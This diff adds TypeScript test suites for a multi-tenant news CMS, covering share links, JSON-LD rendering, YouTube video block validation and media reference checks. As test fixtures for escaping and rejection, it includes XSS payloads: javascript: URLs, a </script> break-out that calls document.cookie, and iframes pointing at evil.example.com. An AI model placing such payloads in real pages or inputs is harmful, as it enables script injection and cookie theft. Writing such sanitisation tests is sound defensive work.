+import { resolveSocialPreviewImageSourceId } from "../src/modules/blog-content/domain/social-preview-image-resolution";
+
+const EXPLICIT = "11111111-1111-1111-1111-111111111111";
+const FEATURED = "22222222-2222-2222-2222-222222222222";
+const CONTENT_1 = "33333333-3333-3333-3333-333333333333";
+const CONTENT_2 = "44444444-4444-4444-4444-444444444444";
+const TENANT_FALLBACK = "55555555-5555-5555-5555-555555555555";
+
+describe("resolveSocialPreviewImageSourceId (Issue #649)", () => {
+  test("priority 1: explicit SEO image wins when all four sources resolve safely", () => {
+    const resolved = new Set([EXPLICIT, FEATURED, CONTENT_1, TENANT_FALLBACK]);
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: EXPLICIT,
+        featuredMediaId: FEATURED,
+        contentImageMediaIds: [CONTENT_1],
+        tenantFallbackImageMediaId: TENANT_FALLBACK
+      },
+      resolved
+    );
+    expect(result).toBe(EXPLICIT);
+  });
+
+  test("priority 2: featured image wins when explicit SEO image is null", () => {
+    const resolved = new Set([FEATURED, CONTENT_1, TENANT_FALLBACK]);
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: null,
+        featuredMediaId: FEATURED,
+        contentImageMediaIds: [CONTENT_1],
+        tenantFallbackImageMediaId: TENANT_FALLBACK
+      },
+      resolved
+    );
+    expect(result).toBe(FEATURED);
+  });
+
+  test("priority 3: first verified content image wins when explicit + featured are absent", () => {
+    const resolved = new Set([CONTENT_1, CONTENT_2, TENANT_FALLBACK]);
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: null,
+        featuredMediaId: null,
+        contentImageMediaIds: [CONTENT_1, CONTENT_2],
+        tenantFallbackImageMediaId: TENANT_FALLBACK
+      },
+      resolved
+    );
+    expect(result).toBe(CONTENT_1);
+  });
+
+  test("priority 3 falls through to the SECOND content image when the first one did not resolve safely", () => {
+    const resolved = new Set([CONTENT_2, TENANT_FALLBACK]);
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: null,
+        featuredMediaId: null,
+        contentImageMediaIds: [CONTENT_1, CONTENT_2],
+        tenantFallbackImageMediaId: TENANT_FALLBACK
+      },
+      resolved
+    );
+    expect(result).toBe(CONTENT_2);
+  });
+
+  test("priority 4: tenant fallback wins when nothing else resolves", () => {
+    const resolved = new Set([TENANT_FALLBACK]);
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: EXPLICIT,
+        featuredMediaId: FEATURED,
+        contentImageMediaIds: [CONTENT_1],
+        tenantFallbackImageMediaId: TENANT_FALLBACK
+      },
+      resolved
+    );
+    expect(result).toBe(TENANT_FALLBACK);
+  });
+
+  test("null when NOTHING resolves safely, even though every candidate id is present", () => {
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: EXPLICIT,
+        featuredMediaId: FEATURED,
+        contentImageMediaIds: [CONTENT_1],
+        tenantFallbackImageMediaId: TENANT_FALLBACK
+      },
+      new Set()
+    );
+    expect(result).toBeNull();
+  });
+
+  test("null when every candidate is null/empty", () => {
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: null,
+        featuredMediaId: null,
+        contentImageMediaIds: [],
+        tenantFallbackImageMediaId: null
+      },
+      new Set(["irrelevant-id"])
+    );
+    expect(result).toBeNull();
+  });
+
+  test("an unsafe (unresolved) higher-priority candidate is skipped, not treated as a hard stop", () => {
+    // explicit id is present but NOT in resolved set -> falls through to featured.
+    const resolved = new Set([FEATURED]);
+    const result = resolveSocialPreviewImageSourceId(
+      {
+        explicitSocialImageMediaId: EXPLICIT,
+        featuredMediaId: FEATURED,
+        contentImageMediaIds: [],
+        tenantFallbackImageMediaId: null
+      },
+      resolved
+    );
+    expect(result).toBe(FEATURED);
+  });
+});

--- a/tests/social-share-links.test.ts
+++ b/tests/social-share-links.test.ts
@@ -1,0 +1,258 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  buildSocialShareLinks,
+  renderSocialShareButtonsHtml,
+  type SocialShareRenderConfig
+} from "../src/modules/blog-content/domain/social-share-links";
+
+const ARTICLE = {
+  canonicalUrl: "https://news.example.test/articles/hello-world",
+  title: "Hello & World",
+  excerpt: "An excerpt with <b>markup</b>."
+};
+
+const ALL_ENABLED: SocialShareRenderConfig = {
+  buttonsEnabled: true,
+  native: true,
+  whatsapp: true,
+  telegram: true,
+  facebook: true,
+  linkedin: true,
+  x: true,
+  email: true,
+  instagramNativeOnly: true
+};
+
+describe("buildSocialShareLinks (Issue #642)", () => {
+  test("builds every enabled platform's URL-encoded share link", () => {
+    const links = buildSocialShareLinks(ARTICLE, ALL_ENABLED);
+    const byPlatform = new Map(links.map((link) => [link.platform, link.href]));
+
+    expect(byPlatform.get("whatsapp")).toBe(
+      `https://wa.me/?text=${encodeURIComponent("Hello & World https://news.example.test/articles/hello-world")}`
+    );
+    expect(byPlatform.get("telegram")).toBe(
+      `https://t.me/share/url?url=${encodeURIComponent(ARTICLE.canonicalUrl)}&text=${encodeURIComponent(ARTICLE.title)}`
+    );
+    expect(byPlatform.get("facebook")).toBe(
+      `https://www.facebook.com/sharer/sharer.php?u=${encodeURIComponent(ARTICLE.canonicalUrl)}`
+    );
+    expect(byPlatform.get("linkedin")).toBe(
+      `https://www.linkedin.com/sharing/share-offsite/?url=${encodeURIComponent(ARTICLE.canonicalUrl)}`
+    );
+    expect(byPlatform.get("x_twitter")).toBe(
+      `https://twitter.com/intent/tweet?url=${encodeURIComponent(ARTICLE.canonicalUrl)}&text=${encodeURIComponent(ARTICLE.title)}`
+    );
+    expect(byPlatform.get("email")).toContain("mailto:?subject=");
+  });
+
+  test("never emits raw/unencoded title or URL characters (e.g. '&', ' ') in any href", () => {
+    const links = buildSocialShareLinks(ARTICLE, ALL_ENABLED);
+
+    for (const link of links) {
+      // The canonical URL's own scheme separator is fine; what we must
+      // never see is the raw article title/excerpt text unescaped inside
+      // the query string (e.g. a literal space or literal "&" that isn't
+      // part of the query-string delimiter grammar).
+      expect(link.href).not.toContain("Hello & World");
+      expect(link.href).not.toContain("<b>markup</b>");
+    }
+  });
+
+  test("disabled platforms are excluded from the result", () => {
+    const links = buildSocialShareLinks(ARTICLE, {
+      ...ALL_ENABLED,
+      whatsapp: false,
+      x: false
+    });
+    const platforms = links.map((link) => link.platform);
+
+    expect(platforms).not.toContain("whatsapp");
+    expect(platforms).not.toContain("x_twitter");
+    expect(platforms).toContain("telegram");
+    expect(platforms).toContain("facebook");
+    expect(platforms).toContain("linkedin");
+    expect(platforms).toContain("email");
+  });
+
+  test("no platform is ever included outside the fixed six-platform allowlist", () => {
+    const links = buildSocialShareLinks(ARTICLE, ALL_ENABLED);
+    const allowlist = new Set([
+      "whatsapp",
+      "telegram",
+      "facebook",
+      "linkedin",
+      "x_twitter",
+      "email"
+    ]);
+
+    expect(links.length).toBe(6);
+    for (const link of links) {
+      expect(allowlist.has(link.platform)).toBe(true);
+    }
+  });
+
+  test("returns an empty array when the canonical URL is not a safe absolute http(s) URL", () => {
+    const links = buildSocialShareLinks(
+      { ...ARTICLE, canonicalUrl: "javascript:alert(1)" },
+      ALL_ENABLED
+    );
+    expect(links).toEqual([]);
+  });
+});
+
+describe("renderSocialShareButtonsHtml (Issue #642)", () => {
+  test("renders nothing when buttonsEnabled is false", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      { ...ALL_ENABLED, buttonsEnabled: false },
+      "/js/news-share.js"
+    );
+    expect(html).toBe("");
+  });
+
+  test("renders nothing when the canonical URL is unsafe", () => {
+    const html = renderSocialShareButtonsHtml(
+      { ...ARTICLE, canonicalUrl: "javascript:alert(1)" },
+      ALL_ENABLED,
+      "/js/news-share.js"
+    );
+    expect(html).toBe("");
+  });
+
+  test("escapes title/excerpt and includes rel=noopener noreferrer + accessible labels on every external link", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      ALL_ENABLED,
+      "/js/news-share.js"
+    );
+
+    expect(html).toContain("Hello &amp; World");
+    expect(html).not.toContain("<b>markup</b>");
+    // Every static platform link must carry rel="noopener noreferrer" and
+    // target="_blank" (issue: "Add rel=noopener noreferrer for external
+    // share links").
+    const anchorMatches = [...html.matchAll(/<a\b[^>]*>/g)];
+    expect(anchorMatches.length).toBeGreaterThan(0);
+    for (const [anchorTag] of anchorMatches) {
+      expect(anchorTag).toContain('rel="noopener noreferrer"');
+      expect(anchorTag).toContain('target="_blank"');
+      expect(anchorTag).toContain("aria-label=");
+    }
+  });
+
+  test("native share button is present but `hidden` server-side (revealed only client-side when supported)", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      ALL_ENABLED,
+      "/js/news-share.js"
+    );
+    expect(html).toContain(
+      'class="news-share__native js-news-share-native" hidden'
+    );
+  });
+
+  test("native share button is entirely absent when NEWS_SHARE_NATIVE_ENABLED=false", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      { ...ALL_ENABLED, native: false },
+      "/js/news-share.js"
+    );
+    expect(html).not.toContain("js-news-share-native");
+  });
+
+  test("copy-link button is always present when buttonsEnabled is true, regardless of other platform flags", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      {
+        buttonsEnabled: true,
+        native: false,
+        whatsapp: false,
+        telegram: false,
+        facebook: false,
+        linkedin: false,
+        x: false,
+        email: false,
+        instagramNativeOnly: false
+      },
+      "/js/news-share.js"
+    );
+
+    expect(html).toContain("js-news-share-copy");
+  });
+
+  test("disabled platforms produce no <a> link for that platform", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      { ...ALL_ENABLED, whatsapp: false },
+      "/js/news-share.js"
+    );
+    expect(html).not.toContain("news-share__link--whatsapp");
+    expect(html).toContain("news-share__link--telegram");
+  });
+
+  test("never emits a fake Instagram share link/button", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      ALL_ENABLED,
+      "/js/news-share.js"
+    );
+    expect(html).not.toContain("instagram.com");
+    expect(html).not.toContain("news-share__link--instagram");
+  });
+
+  test("Instagram note text changes based on whether native share is enabled", () => {
+    const withNative = renderSocialShareButtonsHtml(
+      ARTICLE,
+      ALL_ENABLED,
+      "/js/news-share.js"
+    );
+    expect(withNative).toContain("Instagram: use the Share button above");
+
+    const withoutNative = renderSocialShareButtonsHtml(
+      ARTICLE,
+      { ...ALL_ENABLED, native: false },
+      "/js/news-share.js"
+    );
+    expect(withoutNative).toContain("Instagram: use Copy link");
+  });
+
+  test("Instagram note is omitted entirely when NEWS_SHARE_INSTAGRAM_NATIVE_ONLY=false", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      { ...ALL_ENABLED, instagramNativeOnly: false },
+      "/js/news-share.js"
+    );
+    expect(html).not.toContain("Instagram");
+  });
+
+  test("only one <script> tag is emitted, pointing at the given same-origin scriptSrc — no third-party script", () => {
+    const html = renderSocialShareButtonsHtml(
+      ARTICLE,
+      ALL_ENABLED,
+      "/js/news-share.js"
+    );
+    const scriptTags = [...html.matchAll(/<script\b[^>]*>/gi)];
+
+    expect(scriptTags.length).toBe(1);
+    expect(scriptTags[0]![0]).toContain('src="/js/news-share.js"');
+    expect(html).not.toMatch(/<script[^>]*src="https?:\/\//i);
+  });
+
+  test("uses the canonical URL, never a raw querystring-bearing URL, in data-share-url/href", () => {
+    const trackedArticle = {
+      ...ARTICLE,
+      canonicalUrl: "https://news.example.test/articles/hello-world"
+    };
+    const html = renderSocialShareButtonsHtml(
+      trackedArticle,
+      ALL_ENABLED,
+      "/js/news-share.js"
+    );
+    expect(html).toContain(`data-share-url="${trackedArticle.canonicalUrl}"`);
+    expect(html).not.toContain("?utm_");
+    expect(html).not.toContain("?admin_preview");
+    expect(html).not.toContain("session_id");
+  });
+});

--- a/tests/structured-data-rendering.test.ts
+++ b/tests/structured-data-rendering.test.ts
@@ -1,0 +1,136 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  buildNewsArticleJsonLd,
+  renderJsonLdScriptTag
+} from "../src/modules/blog-content/domain/structured-data-rendering";
+
+const BASE_INPUT = {
+  headline: "Headline",
+  description: "Description",
+  canonicalUrl: "https://example.com/news/my-post",
+  image: null,
+  datePublished: new Date("2026-01-01T00:00:00.000Z"),
+  dateModified: new Date("2026-01-02T00:00:00.000Z"),
+  authorName: "Acme",
+  publisherName: "Acme",
+  publisherLogoUrl: null,
+  articleSection: null,
+  tags: []
+} as const;
+
+describe("buildNewsArticleJsonLd (Issue #649)", () => {
+  test("builds a NewsArticle object with @context/@type/headline/description/dates/mainEntityOfPage", () => {
+    const result = buildNewsArticleJsonLd(BASE_INPUT);
+    expect(result["@context"]).toBe("https://schema.org");
+    expect(result["@type"]).toBe("NewsArticle");
+    expect(result.headline).toBe("Headline");
+    expect(result.description).toBe("Description");
+    expect(result.datePublished).toBe("2026-01-01T00:00:00.000Z");
+    expect(result.dateModified).toBe("2026-01-02T00:00:00.000Z");
+    expect(result.mainEntityOfPage).toEqual({
+      "@type": "WebPage",
+      "@id": "https://example.com/news/my-post"
+    });
+  });
+
+  test("author and publisher are Organization (not Person) — no individual editor identity exposed", () => {
+    const result = buildNewsArticleJsonLd(BASE_INPUT);
+    expect(result.author).toEqual({ "@type": "Organization", name: "Acme" });
+    expect((result.publisher as Record<string, unknown>)["@type"]).toBe(
+      "Organization"
+    );
+    expect((result.publisher as Record<string, unknown>).name).toBe("Acme");
+  });
+
+  test("omits image entirely when null", () => {
+    const result = buildNewsArticleJsonLd(BASE_INPUT);
+    expect(result.image).toBeUndefined();
+  });
+
+  test("includes image with width/height when provided", () => {
+    const result = buildNewsArticleJsonLd({
+      ...BASE_INPUT,
+      image: {
+        url: "https://media.example.test/a.jpg",
+        width: 1200,
+        height: 630
+      }
+    });
+    expect(result.image).toEqual({
+      "@type": "ImageObject",
+      url: "https://media.example.test/a.jpg",
+      width: 1200,
+      height: 630
+    });
+  });
+
+  test("omits publisher.logo entirely when publisherLogoUrl is null (no fabricated logo)", () => {
+    const result = buildNewsArticleJsonLd(BASE_INPUT);
+    expect((result.publisher as Record<string, unknown>).logo).toBeUndefined();
+  });
+
+  test("includes publisher.logo when publisherLogoUrl is provided", () => {
+    const result = buildNewsArticleJsonLd({
+      ...BASE_INPUT,
+      publisherLogoUrl: "https://media.example.test/logo.png"
+    });
+    expect((result.publisher as Record<string, unknown>).logo).toEqual({
+      "@type": "ImageObject",
+      url: "https://media.example.test/logo.png"
+    });
+  });
+
+  test("omits articleSection/keywords when absent", () => {
+    const result = buildNewsArticleJsonLd(BASE_INPUT);
+    expect(result.articleSection).toBeUndefined();
+    expect(result.keywords).toBeUndefined();
+  });
+
+  test("includes articleSection and joins tags into keywords", () => {
+    const result = buildNewsArticleJsonLd({
+      ...BASE_INPUT,
+      articleSection: "Politics",
+      tags: ["breaking", "election"]
+    });
+    expect(result.articleSection).toBe("Politics");
+    expect(result.keywords).toBe("breaking, election");
+  });
+});
+
+describe("renderJsonLdScriptTag (Issue #649)", () => {
+  test("wraps the serialized object in a <script type=application/ld+json> tag", () => {
+    const tag = renderJsonLdScriptTag({ "@type": "NewsArticle" });
+    expect(tag.startsWith('<script type="application/ld+json">')).toBe(true);
+    expect(tag.endsWith("</script>")).toBe(true);
+    expect(tag).toContain('"@type":"NewsArticle"');
+  });
+
+  test("neutralizes a literal </script> sequence inside a string value (HTML break-out, not a JSON-escaping gap)", () => {
+    const tag = renderJsonLdScriptTag({
+      headline: "</script><script>alert(document.cookie)</script>"
+    });
+    expect(tag).not.toContain(
+      "</script><script>alert(document.cookie)</script>"
+    );
+    // Only `<` is escaped (sufficient to defeat the HTML tokenizer's
+    // `</script` lookup) — the trailing `>` stays literal.
+    expect(tag).toContain("\\u003c/script>");
+    expect(tag).toContain("\\u003cscript>alert(document.cookie)");
+  });
+
+  test("still produces valid JSON once \\u003c is reversed back to <", () => {
+    const data = { headline: "A <b>bold</b> headline" };
+    const tag = renderJsonLdScriptTag(data);
+    const innerJson = tag
+      .slice('<script type="application/ld+json">'.length, -"</script>".length)
+      .replace(/\\u003c/g, "<");
+    expect(JSON.parse(innerJson)).toEqual(data);
+  });
+
+  test("standard JSON escaping (quotes/backslashes) still applies", () => {
+    const tag = renderJsonLdScriptTag({ headline: 'He said "hi"\\bye' });
+    expect(tag).toContain('\\"hi\\"');
+    expect(tag).toContain("\\\\bye");
+  });
+});

--- a/tests/video-news-block-validation.test.ts
+++ b/tests/video-news-block-validation.test.ts
@@ -1,0 +1,305 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  isVideoNewsProvider,
+  normalizeYouTubeVideoId,
+  validateAndNormalizeContentJsonVideoBlocks,
+  VIDEO_NEWS_PROVIDERS
+} from "../src/modules/blog-content/domain/video-news-block-validation";
+
+const VALID_ID = "11111111-1111-1111-1111-111111111111";
+const VIDEO_ID = "dQw4w9WgXcQ";
+
+describe("VIDEO_NEWS_PROVIDERS / isVideoNewsProvider (Issue #639)", () => {
+  test("only youtube is allowlisted today", () => {
+    expect(VIDEO_NEWS_PROVIDERS).toEqual(["youtube"]);
+  });
+
+  test("accepts youtube, rejects anything else", () => {
+    expect(isVideoNewsProvider("youtube")).toBe(true);
+    expect(isVideoNewsProvider("vimeo")).toBe(false);
+    expect(isVideoNewsProvider('vimeo" src="javascript:alert(1)')).toBe(false);
+    expect(isVideoNewsProvider(123)).toBe(false);
+    expect(isVideoNewsProvider(undefined)).toBe(false);
+    expect(isVideoNewsProvider(null)).toBe(false);
+  });
+});
+
+describe("normalizeYouTubeVideoId (Issue #639)", () => {
+  test("accepts a bare 11-character video id", () => {
+    expect(normalizeYouTubeVideoId(VIDEO_ID)).toBe(VIDEO_ID);
+  });
+
+  test("normalizes a watch?v= URL", () => {
+    expect(
+      normalizeYouTubeVideoId(`https://www.youtube.com/watch?v=${VIDEO_ID}`)
+    ).toBe(VIDEO_ID);
+    expect(
+      normalizeYouTubeVideoId(`https://youtube.com/watch?v=${VIDEO_ID}&t=30s`)
+    ).toBe(VIDEO_ID);
+  });
+
+  test("normalizes a youtu.be short URL", () => {
+    expect(normalizeYouTubeVideoId(`https://youtu.be/${VIDEO_ID}`)).toBe(
+      VIDEO_ID
+    );
+  });
+
+  test("normalizes /embed/ and /shorts/ URLs", () => {
+    expect(
+      normalizeYouTubeVideoId(`https://www.youtube.com/embed/${VIDEO_ID}`)
+    ).toBe(VIDEO_ID);
+    expect(
+      normalizeYouTubeVideoId(`https://www.youtube.com/shorts/${VIDEO_ID}`)
+    ).toBe(VIDEO_ID);
+    expect(
+      normalizeYouTubeVideoId(
+        `https://www.youtube-nocookie.com/embed/${VIDEO_ID}`
+      )
+    ).toBe(VIDEO_ID);
+  });
+
+  test("rejects a non-YouTube host", () => {
+    expect(normalizeYouTubeVideoId(`https://vimeo.com/${VIDEO_ID}`)).toBeNull();
+  });
+
+  test("rejects malformed input (not a string, not a URL, wrong-length id)", () => {
+    expect(normalizeYouTubeVideoId(123)).toBeNull();
+    expect(normalizeYouTubeVideoId(undefined)).toBeNull();
+    expect(normalizeYouTubeVideoId("not a url or id")).toBeNull();
+    expect(normalizeYouTubeVideoId("short")).toBeNull();
+    expect(
+      normalizeYouTubeVideoId("https://www.youtube.com/watch?v=too-short")
+    ).toBeNull();
+  });
+
+  test("rejects a raw iframe/script string masquerading as a videoId", () => {
+    expect(
+      normalizeYouTubeVideoId(
+        `<iframe src="https://evil.example.com"></iframe>`
+      )
+    ).toBeNull();
+    expect(
+      normalizeYouTubeVideoId(`javascript:alert(document.cookie)`)
+    ).toBeNull();
+  });
+});
+
+describe("validateAndNormalizeContentJsonVideoBlocks (Issue #639)", () => {
+  test("passes through contentJson unchanged when there is no video_news block", () => {
+    const contentJson = { blocks: [{ type: "paragraph", text: "hi" }] };
+    const result = validateAndNormalizeContentJsonVideoBlocks(contentJson);
+    expect(result).toEqual({ valid: true, value: contentJson });
+  });
+
+  test("tolerates missing/non-array blocks", () => {
+    expect(validateAndNormalizeContentJsonVideoBlocks({})).toEqual({
+      valid: true,
+      value: {}
+    });
+  });
+
+  test("accepts a minimal valid video_news block and normalizes videoId from a URL", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: `https://www.youtube.com/watch?v=${VIDEO_ID}`
+        }
+      ]
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.blocks).toEqual([
+        { type: "video_news", provider: "youtube", videoId: VIDEO_ID }
+      ]);
+    }
+  });
+
+  test("accepts and preserves optional fields, dropping unrecognized ones", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: VIDEO_ID,
+          title: "Breaking news",
+          caption: "A caption",
+          thumbnailMediaObjectId: VALID_ID,
+          durationSeconds: 125,
+          sourceLabel: "Reuters",
+          rawEmbedHtml: '<iframe src="https://evil.example.com"></iframe>',
+          embedHtml: "<script>alert(1)</script>"
+        }
+      ]
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.blocks).toEqual([
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: VIDEO_ID,
+          title: "Breaking news",
+          caption: "A caption",
+          thumbnailMediaObjectId: VALID_ID,
+          durationSeconds: 125,
+          sourceLabel: "Reuters"
+        }
+      ]);
+    }
+  });
+
+  test("rejects an unsupported/unlisted provider", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [{ type: "video_news", provider: "vimeo", videoId: VIDEO_ID }]
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors).toEqual([
+        {
+          field: "contentJson.blocks[0].provider",
+          message: "provider must be one of: youtube."
+        }
+      ]);
+    }
+  });
+
+  test("rejects an invalid/malformed videoId", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [
+        { type: "video_news", provider: "youtube", videoId: "not-a-video-id" }
+      ]
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors).toEqual([
+        {
+          field: "contentJson.blocks[0].videoId",
+          message: "videoId must be a valid YouTube video id or video URL."
+        }
+      ]);
+    }
+  });
+
+  test("rejects a raw iframe string passed as videoId", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: `<iframe src="https://evil.example.com"></iframe>`
+        }
+      ]
+    });
+
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an oversized title/caption/sourceLabel", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: VIDEO_ID,
+          title: "x".repeat(201),
+          caption: "y".repeat(501),
+          sourceLabel: "z".repeat(121)
+        }
+      ]
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((e) => e.field)).toEqual([
+        "contentJson.blocks[0].title",
+        "contentJson.blocks[0].caption",
+        "contentJson.blocks[0].sourceLabel"
+      ]);
+    }
+  });
+
+  test("rejects a negative/non-integer/absurdly large durationSeconds", () => {
+    for (const durationSeconds of [-1, 1.5, 60 * 60 * 24 * 8]) {
+      const result = validateAndNormalizeContentJsonVideoBlocks({
+        blocks: [
+          {
+            type: "video_news",
+            provider: "youtube",
+            videoId: VIDEO_ID,
+            durationSeconds
+          }
+        ]
+      });
+      expect(result.valid).toBe(false);
+    }
+  });
+
+  test("does not format/existence-validate thumbnailMediaObjectId here (left to the mode-gated DB check)", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: VIDEO_ID,
+          thumbnailMediaObjectId: "not-a-uuid-at-all"
+        }
+      ]
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(
+        (result.value.blocks as Array<Record<string, unknown>>)[0]
+          ?.thumbnailMediaObjectId
+      ).toBe("not-a-uuid-at-all");
+    }
+  });
+
+  test("leaves non-video_news blocks (e.g. gallery, paragraph) completely untouched", () => {
+    const galleryBlock = {
+      type: "gallery",
+      items: [{ mediaType: "image", mediaObjectId: VALID_ID }]
+    };
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [{ type: "paragraph", text: "hi" }, galleryBlock]
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.blocks).toEqual([
+        { type: "paragraph", text: "hi" },
+        galleryBlock
+      ]);
+    }
+  });
+
+  test("collects errors across multiple video_news blocks in one pass", () => {
+    const result = validateAndNormalizeContentJsonVideoBlocks({
+      blocks: [
+        { type: "video_news", provider: "vimeo", videoId: VIDEO_ID },
+        { type: "video_news", provider: "youtube", videoId: "bad" }
+      ]
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors).toEqual([
+        {
+          field: "contentJson.blocks[0].provider",
+          message: "provider must be one of: youtube."
+        },
+        {
+          field: "contentJson.blocks[1].videoId",
+          message: "videoId must be a valid YouTube video id or video URL."
+        }
+      ]);
+    }
+  });
+});

--- a/tests/video-news-thumbnail-reference-gate.test.ts
+++ b/tests/video-news-thumbnail-reference-gate.test.ts
@@ -1,0 +1,158 @@
+import { describe, expect, test } from "bun:test";
+
+import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../src/modules/blog-content/application/video-news-thumbnail-reference-gate";
+import type {
+  NewsMediaPort,
+  ResolvedNewsMediaReferenceDTO
+} from "../src/modules/_shared/ports/news-media-port";
+
+const VALID_ID = "11111111-1111-1111-1111-111111111111";
+const OTHER_TENANT_ID = "22222222-2222-2222-2222-222222222222";
+
+/** Fake `tx` — never dereferenced by the gate itself, only forwarded opaquely to `mediaPort`'s methods below, which ignore it. */
+const FAKE_TX = {} as unknown as Bun.SQL;
+
+function fakePort(options: {
+  modeActive: boolean;
+  safeIds?: Set<string>;
+}): NewsMediaPort {
+  return {
+    async isFullOnlineR2ModeActiveForTenant() {
+      return options.modeActive;
+    },
+    async isMediaReferenceSafe(_tx, _tenantId, mediaObjectId) {
+      return options.safeIds?.has(mediaObjectId) ?? false;
+    },
+    async resolveMediaReferences() {
+      return new Map<string, ResolvedNewsMediaReferenceDTO>();
+    },
+    resolveMediaPublicBaseUrl() {
+      return "";
+    }
+  };
+}
+
+describe("validateVideoNewsThumbnailReferencesForFullOnlineR2Mode (Issue #639)", () => {
+  test("valid when contentJson is undefined", async () => {
+    const result =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        FAKE_TX,
+        "tenant-a",
+        undefined,
+        fakePort({ modeActive: true })
+      );
+    expect(result).toEqual({ valid: true });
+  });
+
+  test("no-op (valid) when full-online R2-only mode is not active for the tenant, even with a malformed thumbnailMediaObjectId", async () => {
+    const result =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        FAKE_TX,
+        "tenant-a",
+        {
+          blocks: [
+            {
+              type: "video_news",
+              provider: "youtube",
+              videoId: "dQw4w9WgXcQ",
+              thumbnailMediaObjectId: "not-a-uuid"
+            }
+          ]
+        },
+        fakePort({ modeActive: false })
+      );
+    expect(result).toEqual({ valid: true });
+  });
+
+  test("valid when mode is active but no video_news block references a thumbnail", async () => {
+    const result =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        FAKE_TX,
+        "tenant-a",
+        {
+          blocks: [
+            { type: "video_news", provider: "youtube", videoId: "dQw4w9WgXcQ" }
+          ]
+        },
+        fakePort({ modeActive: true })
+      );
+    expect(result).toEqual({ valid: true });
+  });
+
+  test("valid when mode is active and thumbnailMediaObjectId resolves as safe", async () => {
+    const result =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        FAKE_TX,
+        "tenant-a",
+        {
+          blocks: [
+            {
+              type: "video_news",
+              provider: "youtube",
+              videoId: "dQw4w9WgXcQ",
+              thumbnailMediaObjectId: VALID_ID
+            }
+          ]
+        },
+        fakePort({ modeActive: true, safeIds: new Set([VALID_ID]) })
+      );
+    expect(result).toEqual({ valid: true });
+  });
+
+  test("invalid when mode is active and thumbnailMediaObjectId is malformed", async () => {
+    const result =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        FAKE_TX,
+        "tenant-a",
+        {
+          blocks: [
+            {
+              type: "video_news",
+              provider: "youtube",
+              videoId: "dQw4w9WgXcQ",
+              thumbnailMediaObjectId: "not-a-uuid"
+            }
+          ]
+        },
+        fakePort({ modeActive: true })
+      );
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors).toEqual([
+        {
+          field: "contentJson",
+          message:
+            "contentJson.blocks[0].thumbnailMediaObjectId must be a valid UUID referencing a verified R2 media object in full-online R2-only mode."
+        }
+      ]);
+    }
+  });
+
+  test("invalid when mode is active and thumbnailMediaObjectId does not resolve as safe (cross-tenant/deleted/unverified)", async () => {
+    const result =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        FAKE_TX,
+        "tenant-a",
+        {
+          blocks: [
+            {
+              type: "video_news",
+              provider: "youtube",
+              videoId: "dQw4w9WgXcQ",
+              thumbnailMediaObjectId: OTHER_TENANT_ID
+            }
+          ]
+        },
+        fakePort({ modeActive: true, safeIds: new Set([VALID_ID]) })
+      );
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors).toEqual([
+        {
+          field: "contentJson",
+          message: `contentJson references thumbnailMediaObjectId "${OTHER_TENANT_ID}" which does not exist, does not belong to this tenant, or is not a verified R2 media object.`
+        }
+      ]);
+    }
+  });
+});


### PR DESCRIPTION
